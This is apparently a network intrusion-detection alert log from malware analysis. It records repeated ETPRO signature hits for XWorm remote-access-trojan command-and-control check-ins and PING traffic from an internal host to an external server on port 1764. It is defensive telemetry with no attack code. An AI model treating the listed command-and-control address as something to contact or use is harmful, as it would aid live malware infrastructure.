                                                                                        2024-10-13T19:10:30.257087+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:30.359948+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:30.359948+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:30.469891+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:30.469891+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:30.593763+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:30.593763+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:30.703591+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:30.703591+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:30.860163+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:30.860163+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:30.987403+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:30.987403+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:31.094276+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:31.094276+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:31.251747+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.231764192.168.2.550002TCP
                                                                                        2024-10-13T19:10:31.251866+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:31.251866+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:31.254053+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550002147.185.221.231764TCP
                                                                                        2024-10-13T19:10:31.344278+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:31.344278+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:31.453754+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:31.453754+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:31.563001+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:31.563001+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:31.672488+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:31.672488+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:31.781906+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:31.781906+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:31.891067+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:31.891067+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:32.000546+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:32.000546+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:32.148597+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:32.148597+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:32.221476+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:32.221476+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:32.328704+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:32.328704+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:32.438081+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:32.438081+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:32.547770+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:32.547770+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:32.672464+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:32.672464+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:32.804279+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:32.804279+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:32.950881+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:32.950881+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:33.063078+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:33.063078+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:33.172267+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:33.172267+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:33.557001+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:33.557001+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:33.735678+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:33.735678+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:33.844344+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:33.844344+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:33.953755+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:33.953755+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:34.070879+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:34.070879+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:34.172310+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:34.172310+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:34.297574+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:34.297574+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:34.406743+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:34.406743+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:34.516177+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:34.516177+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:34.627227+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:34.627227+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:34.745194+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:34.745194+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:34.860016+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:34.860016+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:34.970202+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:34.970202+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:35.078796+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:35.078796+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:35.187959+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:35.187959+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:35.319678+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:35.319678+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:35.437958+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:35.437958+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:35.547473+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:35.547473+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:35.656909+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:35.656909+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:35.766133+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:35.766133+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:35.895762+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:35.895762+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:36.000667+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:36.000667+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:36.109893+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:36.109893+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:36.222217+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:36.222217+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:36.342893+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:36.342893+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:36.455920+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:36.455920+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:36.579311+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:36.579311+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:36.812917+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:36.812917+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:36.814522+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:36.814522+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:36.923428+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:36.923428+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:37.031792+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:37.031792+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:37.141115+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:37.141115+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:37.250654+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:37.250654+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:37.367628+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:37.367628+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:37.485001+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:37.485001+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:37.594352+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:37.594352+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:37.714350+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:37.714350+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:37.832050+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:37.832050+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:37.938164+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:37.938164+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:38.050712+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:38.050712+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:38.157202+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:38.157202+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:38.291012+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:38.291012+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:38.406634+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:38.406634+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:38.516430+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:38.516430+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:38.626599+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:38.626599+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:38.747269+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:38.747269+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:38.866560+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:38.866560+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:38.984777+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:38.984777+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:39.096261+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:39.096261+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:39.204463+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:39.204463+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:39.314260+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:39.314260+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:39.429368+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:39.429368+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:39.547364+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:39.547364+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:39.672949+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:39.672949+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:39.813179+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:39.813179+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:39.928482+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:39.928482+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:40.047604+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:40.047604+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:40.158321+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:40.158321+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:40.297413+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:40.297413+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:40.406814+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:40.406814+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:40.516062+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:40.516062+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:40.625603+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:40.625603+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:40.745684+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:40.745684+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:40.859773+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:40.859773+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
